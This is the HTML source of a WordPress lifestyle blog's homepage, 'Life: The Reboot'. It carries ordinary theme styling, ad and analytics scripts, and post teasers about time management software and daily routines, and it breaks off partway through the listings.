.site-mobile-navigation, .hm-light.theme-header2 .site-mobile-navigation, .hm-light.is-sticky-started .site-header .site-header-two .site-header-middle, .hm-dark.is-sticky-started .site-header .site-header-two .site-header-middle{ background-color:!important; color:!important;}.hb-light .site-header .site-header-bottom, .hb-dark .site-header .site-header-bottom, .hb-light .site-header .site-header-four .site-header-bottom, .hb-dark .site-header .site-header-four .site-header-bottom, .hb-light.is-sticky-started .site-header .site-header-four .site-header-bottom, .hb-dark.is-sticky-started .site-header .site-header-four .site-header-bottom, .hb-light.theme-header4 .site-mobile-navigation, .hb-dark.theme-header4 .site-mobile-navigation .hb-light .site-header-one .primary-navigation ul, .hb-light .site-header-two .primary-navigation ul, .hb-dark .site-header-one .primary-navigation ul, .hb-dark .site-header-two .primary-navigation ul, .hb-light .site-header-one .primary-navigation, .hb-light .site-header-two .primary-navigation, .hb-dark .site-header-one .primary-navigation, .hb-dark .site-header-two .primary-navigation{ background-color:; color:;}.ft-light .site-footer .site-footer-top, .ft-dark .site-footer .site-footer-top, .ft-light .site-footer .site-footer-top .widget, .ft-dark .site-footer .site-footer-top .widget{ background-color:; color:;}.fb-light .site-footer .site-footer-bottom, .fb-dark .site-footer .site-footer-bottom{ background-color:; color:;}.entry .entry-header .entry-title{color:;}.widget .widget-title span, .wrapper-light .widget.widget-line .widget-title span, .ft-light .site-footer .widget.widget-line .widget-title span, .wrapper-dark .widget.widget-line .widget-title span, .ft-dark .site-footer .widget.widget-line .widget-title span, .wrapper-light .widget.widget-non-line .widget-title span, .ft-light .site-footer .widget.widget-non-line .widget-title span, .wrapper-dark .widget.widget-non-line .widget-title span, .ft-dark .site-footer .widget.widget-non-line .widget-title span{ background-color:; border-color:; color:;}.wrapper-light .widget.widget-hor.widget-non-line .widget-title, .ft-light .site-footer .widget.widget-hor.widget-non-line .widget-title, .wrapper-dark .widget.widget-hor.widget-non-line .widget-title, .ft-dark .site-footer .widget.widget-hor.widget-non-line .widget-title{ border-color:;}.wrapper-light .widget.widget-non-line.widget-hor .widget-title, .ft-light .widget.widget-non-line.widget-hor .widget-title, .wrapper-dark .widget.widget-non-line.widget-hor .widget-title, .ft-dark .widget.widget-non-line.widget-hor .widget-title{ border-color:;} .pace .pace-progress { display: block; position: fixed; z-index: 2000; top: 0; right: 100%; width: 100%; height: 5px; background:#1e73be; pointer-events: none; } </style> <script> var RTL = false; </script> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <style type="text/css"> /* If html does not have either class, do not show lazy loaded images. */ html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image { display: none; } </style> <script> document.documentElement.classList.add( 'jetpack-lazy-images-js-enabled' ); </script> <script type="text/javascript"> var __ATA_PP = { pt: 0, ht: 2, tn: 'writee-pro', amp: false, siteid: 143786843, consent: 0 }; var __ATA = __ATA || {}; __ATA.cmd = __ATA.cmd || []; __ATA.criteo = __ATA.criteo || {}; __ATA.criteo.cmd = __ATA.criteo.cmd || []; </script> <link rel='dns-prefetch' href='//s.pubmine.com' /> <link rel='dns-prefetch' href='//x.bidswitch.net' /> <link rel='dns-prefetch' href='//static.criteo.net' /> <link rel='dns-prefetch' href='//ib.adnxs.com' /> <link rel='dns-prefetch' href='//aax.amazon-adsystem.com' /> <link rel='dns-prefetch' href='//bidder.criteo.com' /> <link rel='dns-prefetch' href='//cas.criteo.com' /> <link rel='dns-prefetch' href='//gum.criteo.com' /> <link rel='dns-prefetch' href='//ads.pubmatic.com' /> <link rel='dns-prefetch' href='//gads.pubmatic.com' /> <link rel='dns-prefetch' href='//tpc.googlesyndication.com' /> <link rel='dns-prefetch' href='//ad.doubleclick.net' /> <link rel='dns-prefetch' href='//googleads.g.doubleclick.net' /> <link rel='dns-prefetch' href='//www.googletagservices.com' /> <script async type="text/javascript" src="//s.pubmine.com/head.js"></script><link rel="icon" href="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/03/cropped-Temp-Logo-1.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/03/cropped-Temp-Logo-1.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/03/cropped-Temp-Logo-1.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/03/cropped-Temp-Logo-1.png?fit=270%2C270&#038;ssl=1" /> <!-- BEGIN ExactMetrics v5.3.8 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <div class="wpcnt wpcnt-header"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u top"> <div style="padding-bottom:15px;width:728px;height:90px;"> <div id="atatags-1-5cdd69ccc56fd"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-1-5cdd69ccc56fd', { collapseEmpty: 'before', sectionId: '1437868432', location: 110, width: 728, height: 90 }); }); </script> </div> </div> </div> </div> </div> <style type="text/css" id="wp-custom-css"> @media (max-width:767px){ .site-brand{ padding:0!important; } .site-brand:after { display: table; clear: both; content: ""; } .site-logo img{ max-height: 50px; } } </style> <style id="kirki-inline-styles">@font-face{font-display:swap;font-family:'Alice';font-style:normal;font-weight:400;src:local('Alice Regular'), local('Alice-Regular'), url(https://lifethereboot.com/wp-content/uploads/2019/05/OpNCnoEEmtHa6GcDrgg-1.woff) format('woff');}@font-face{font-display:swap;font-family:'Playfair Display';font-style:normal;font-weight:400;src:local('Playfair Display Regular'), local('PlayfairDisplay-Regular'), url(https://lifethereboot.com/wp-content/uploads/2019/05/nuFiD-vYSZviVYUb_rj3ij__anPXPTg-1.woff) format('woff');}</style><script async src='https://stats.wp.com/s-201920.js'></script> </head> <body id="site-body" class="home blog wp-custom-logo woocommerce-no-js unselectable body-light wrapper-light ht-light hm-light hb-light ft-light fb-light no-pattern theme-header1"> <div class="site-mobile-navigation"></div> <div class="site-wrapper shadow-wrapper "> <header id="site-header" class="site-header"> <div class="site-header-one"> <div class="site-header-top "> <div class="site-container"> <div class="site-table-row"> <div class="site-header-top-left site-column-3"> </div> <div class="site-header-top-center site-column-6"> <div class="site-brand" style="padding-top:0px; padding-bottom:0px;"> <h1 class="site-logo"> <a href="https://lifethereboot.com/" rel="home"> <img width="1188" height="413" src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/03/Life_-The-Reboot-subtitle.png?fit=1200%2C628&ssl=1" class="custom-logo" alt="Life: The Reboot"> </a> </h1> <a href="https://lifethereboot.com/" class="mobile-navigation-toggle"></a> </div> </div> <div class="site-header-top-right site-column-3"> <nav id="social-navigation" class="social-navigation original-colors"><ul><li><a href="https://www.facebook.com/lifethereboot" target="_blank"><span class="fa fa-facebook"></span></a></li><li><a href="https://twitter.com/lifethereboot" target="_blank"><span class="fa fa-twitter"></span></a></li><li><a href="https://www.instagram.com/lifethereboot/" target="_blank"><span class="fa fa-instagram"></span></a></li><li><a href="https://plus.google.com/u/0/b/110795293840323358475/104294516904926731155" target="_blank"><span class="fa fa-google-plus"></span></a></li><li><a href="https://www.youtube.com/channel/UCNJeK8d4Z_pzM4VUor-qH7Q" target="_blank"><span class="fa fa-youtube"></span></a></li><li><a href="https://www.pinterest.com/lifethereboot" target="_blank"><span class="fa fa-pinterest-p"></span></a></li></ul></nav> </div> </div> </div> </div> <div class="site-header-bottom "> <div class="site-container"> <div class="site-row"> <div class="site-column-12"> <nav class="primary-navigation" id="primary-navigation" role="navigation"> <ul id="menu-main-menu" class=""><li id="menu-item-113" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-113"><a href="https://lifethereboot.com">HOME</a></li> <li id="menu-item-2298" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2298"><a href="https://lifethereboot.com/about-us/">ABOUT US</a></li> <li id="menu-item-2299" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2299"><a href="https://lifethereboot.com/contact-2/">CONTACT US/USER REQUEST FORM</a></li> </ul> </nav> <a href="javascript:void(0)" class="site-search-toggle" id="search-trigger"><span class="fa fa-search"></span></a> </div> </div> </div> <div class="site-header-search" style="display: none;"> <div class="site-container"> <div class="site-row"> <div class="site-search site-columns-12"> <form role="search" method="get" id="searchform" class="searchform" action="https://lifethereboot.com/"> <input type="text" value="" name="s" id="s" class="form-control" placeholder="Search keywords..."> </form> <a href="javascript:void(0)" class="site-search-close" id="close-search"></a> </div> </div> </div> </div> </div> </div> </header><!-- / header --> <section class="site-main with-right-sidebar"> <div class="site-container"> <div class="site-row"> <div class="site-featured-sidebar with-3-col"> <div id="media_image-6" class="widget_title widget-line widget widget_media_image widget-top-space widget-ver widget-top-header"><h6 class="widget-title"><span>Shop at Life: The Reboot</span></h6><a href="https://shop.lifethereboot.com"><img width="300" height="300" src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?fit=300%2C300&amp;ssl=1" class="image wp-image-3861 attachment-medium size-medium jetpack-lazy-image" alt="" style="max-width: 100%; height: auto;" data-attachment-id="3861" data-permalink="https://lifethereboot.com/shop-the-life_-the-reboot-store-3/" data-orig-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Shop THe Life_ THe Reboot Store" data-image-description="" data-medium-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?w=1080&amp;ssl=1 1080w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=600%2C600&amp;ssl=1 600w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=640%2C640&amp;ssl=1 640w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=905%2C905&amp;ssl=1 905w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=500%2C500&amp;ssl=1 500w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Shop-THe-Life_-THe-Reboot-Store-2.png?fit=300%2C300&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></div><div id="media_image-5" class="widget_title widget-line widget widget_media_image widget-top-space widget-ver widget-top-header"><h6 class="widget-title"><span>WEEKLY MOTIVATION</span></h6><a href="https://www.instagram.com/p/BsFMwSlo6xX/"><img width="300" height="300" src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?fit=300%2C300&amp;ssl=1" class="image wp-image-4116 attachment-medium size-medium jetpack-lazy-image" alt="" style="max-width: 100%; height: auto;" data-attachment-id="4116" data-permalink="https://lifethereboot.com/2019-instagram/" data-orig-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2019 instagram" data-image-description="" data-medium-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?w=1080&amp;ssl=1 1080w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=600%2C600&amp;ssl=1 600w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=640%2C640&amp;ssl=1 640w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=905%2C905&amp;ssl=1 905w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=500%2C500&amp;ssl=1 500w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/01/2019-instagram.png?fit=300%2C300&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></div><div id="media_image-7" class="widget_title widget-line widget widget_media_image widget-top-space widget-ver widget-top-header"><h6 class="widget-title"><span>My Products on AMAZON</span></h6><a href="https://www.amazon.com/author/lifethereboot"><img width="300" height="300" src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?fit=300%2C300&amp;ssl=1" class="image wp-image-3839 attachment-medium size-medium jetpack-lazy-image" alt="" style="max-width: 100%; height: auto;" data-attachment-id="3839" data-permalink="https://lifethereboot.com/christmas-author-page/" data-orig-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Christmas author page" data-image-description="" data-medium-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?w=1080&amp;ssl=1 1080w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=600%2C600&amp;ssl=1 600w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=640%2C640&amp;ssl=1 640w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=905%2C905&amp;ssl=1 905w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=500%2C500&amp;ssl=1 500w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/12/Christmas-author-page.png?fit=300%2C300&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></div> </div> </div> <div class="site-row"> <div class="site-content expand-view with-sidebar" id="site-content" role="main"> <div class="list-container list-with-sidebar "> <article id="entry-50" class="post-50 post type-post status-publish format-standard has-post-thumbnail hentry category-lifestyle category-organization category-personal-development tag-organization tag-routine tag-time-management-software entry entry-left"> <div class="entry-row"> <div class="entry-half-left"> <div class="entry-media"><div style="max-width:500px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/time-management-software-and-routines/" class="entry-thumb" title="Time Management Software and Your Routines"><img width="500" height="500" src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=500%2C500&amp;ssl=1" class="attachment-WRT-list-view size-WRT-list-view wp-post-image jetpack-lazy-image" alt="" data-attachment-id="4631" data-permalink="https://lifethereboot.com/time-management-software-and-routines/time-management-software-instagram/" data-orig-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="time management software instagram" data-image-description="" data-medium-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?w=1080&amp;ssl=1 1080w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=600%2C600&amp;ssl=1 600w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=640%2C640&amp;ssl=1 640w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=905%2C905&amp;ssl=1 905w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=500%2C500&amp;ssl=1 500w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 500px) 100vw, 500px" data-lazy-src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/time-management-software-instagram.png?resize=500%2C500&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div> </div> <div class="entry-half-right"> <div class="entry-header" > <div class="entry-meta"> <span class="entry-cat"><a href="https://lifethereboot.com/category/lifestyle/" rel="category tag">LIFESTYLE</a> <a href="https://lifethereboot.com/category/organization/" rel="category tag">ORGANIZATION</a> <a href="https://lifethereboot.com/category/personal-development/" rel="category tag">Personal Development</a></span> </div> <h2 class="entry-title"><a href="https://lifethereboot.com/time-management-software-and-routines/">Time Management Software and Your Routines</a></h2> <div class="entry-meta"> <span class="entry-author">By <span><a href="https://lifethereboot.com/author/reclaimlife/" title="Posts by Dominique" rel="author">Dominique</a> </span></span> <span class="entry-date">on <a href="https://lifethereboot.com/2019/05/"> May 16, 2019</a> </span> </div> </div> <div class="entry-content"> <p>Trying to establish a routine but time keeps getting away from you? There are several time management software packages available to help people structure their routines. If you&#8217;re struggling to keep up with the growing demands in your life, try a software program to help. The Basics: Managing Your Schedule The program can be as simple as alerting you when &hellip;</p> </div> </div> </div> <div class="entry-footer"> <div class="entry-footer-top"> <a href="https://lifethereboot.com/time-management-software-and-routines/" title="Time Management Software and Your Routines" class="entry-button button-fill">Continue Reading</a> </div> <div class="entry-footer-bottom"> <div class="entry-comments"> <a href="https://lifethereboot.com/time-management-software-and-routines/#respond"> <span class="fa fa-comment"></span> <span class="comments-counting">0</span> </a> </div> </div> </div> </article><article id="entry-3917" class="post-3917 post type-post status-publish format-standard has-post-thumbnail hentry category-health category-lifestyle category-personal-development tag-routine entry entry-left"> <div class="entry-row"> <div class="entry-half-left"> <div class="entry-media"><div style="max-width:500px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/setting-your-daily-routine/" class="entry-thumb" title="Setting Your Daily Routine"><img width="500" height="500" src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=500%2C500&amp;ssl=1" class="attachment-WRT-list-view size-WRT-list-view wp-post-image jetpack-lazy-image" alt="" data-attachment-id="4627" data-permalink="https://lifethereboot.com/setting-your-daily-routine/setting-your-daily-routine-instagram/" data-orig-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="setting your daily routine instagram" data-image-description="" data-medium-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?w=1080&amp;ssl=1 1080w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=600%2C600&amp;ssl=1 600w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=640%2C640&amp;ssl=1 640w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=905%2C905&amp;ssl=1 905w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=500%2C500&amp;ssl=1 500w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 500px) 100vw, 500px" data-lazy-src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/setting-your-daily-routine-instagram.png?resize=500%2C500&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div> </div> <div class="entry-half-right"> <div class="entry-header" > <div class="entry-meta"> <span class="entry-cat"><a href="https://lifethereboot.com/category/health/" rel="category tag">HEALTH</a> <a href="https://lifethereboot.com/category/lifestyle/" rel="category tag">LIFESTYLE</a> <a href="https://lifethereboot.com/category/personal-development/" rel="category tag">Personal Development</a></span> </div> <h2 class="entry-title"><a href="https://lifethereboot.com/setting-your-daily-routine/">Setting Your Daily Routine</a></h2> <div class="entry-meta"> <span class="entry-author">By <span><a href="https://lifethereboot.com/author/reclaimlife/" title="Posts by Dominique" rel="author">Dominique</a> </span></span> <span class="entry-date">on <a href="https://lifethereboot.com/2019/05/"> May 9, 2019</a> </span> </div> </div> <div class="entry-content"> <p>Who doesn’t love a bit of spontaneity on occasion? It helps to mix things up and keeps life interesting. However, too much spontaneity can lead to an unstructured life. Some people may love that, but most find would find that difficult to maintain. Routine Plan: Sleep For starters, enough sleep is important to function properly. If you don’t have a &hellip;</p> </div> </div> </div> <div class="entry-footer"> <div class="entry-footer-top"> <a href="https://lifethereboot.com/setting-your-daily-routine/" title="Setting Your Daily Routine" class="entry-button button-fill">Continue Reading</a> </div> <div class="entry-footer-bottom"> <div class="entry-comments"> <a href="https://lifethereboot.com/setting-your-daily-routine/#comments"> <span class="fa fa-comment"></span> <span class="comments-counting">14</span> </a> </div> </div> </div> </article><article id="entry-55" class="post-55 post type-post status-publish format-standard has-post-thumbnail hentry category-health category-lifestyle category-personal-development tag-productivity tag-routine tag-zone entry entry-left"> <div class="entry-row"> <div class="entry-half-left"> <div class="entry-media"><div style="max-width:500px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/why-routine-is-good-for-you/" class="entry-thumb" title="Why Routine Is Good for You"><img width="500" height="500" src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=500%2C500&amp;ssl=1" class="attachment-WRT-list-view size-WRT-list-view wp-post-image jetpack-lazy-image" alt="" data-attachment-id="4623" data-permalink="https://lifethereboot.com/why-routine-is-good-for-you/good-routine-instagram/" data-orig-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?fit=1080%2C1080&amp;ssl=1" 